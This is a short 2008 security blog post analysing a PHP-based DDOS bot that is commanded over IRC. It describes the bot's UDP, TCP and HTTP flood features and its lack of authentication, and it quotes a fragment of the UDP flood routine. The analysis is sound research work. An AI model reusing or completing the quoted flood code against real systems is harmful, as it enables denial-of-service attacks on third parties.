« Spammed downloader
Java DDOS bot »

PHP DDOS Bot

Every so often I run into some new evil that interests me enough to take a deeper peek. This time a DDOS bot written in PHP caught my eye. I haven’t seen this in the wild anywhere, but it’s still quite interesting.

The bot itself is pure DDOS bot that allows UDP, TCP and HTTP DDOS attacks. It seems to be either some kind of PoC (Proof of Concept) or handiwork of some inexperienced malware writer. It doesn’t support any authentication so basically anyone could command the botnet if they know the server and channel where it sits. On top of that, the attack routines are a bit inefficient:

[code]

fputs($verbinden,”privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n”);
$fp = fsockopen(“udp://$read2[4]”, 500, $errno, $errstr, 30);
if (!$fp)
{
//echo “$errstr ($errno)<br>\n”; //troep
exit;
}
else
{
$char = “a”;
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;

[/code]

Based on the variablenames the author of this malware is pretty likely from Germany, though Austria and Switzerland are possibilities too.

This entry was posted on Saturday, May 10th, 2008 at 7:00 am and is filed under General InfoSec, Malware FreakShow. You can follow any responses to this entry through the RSS 2.0 feed. Responses are currently closed, but you can trackback from your own site.

Comments are closed.

If you want to comment on this article please send e-mail
to authors(_at_)teamfurry.com or go to the forums.

InspectorWordpress has prevented 2 attacks.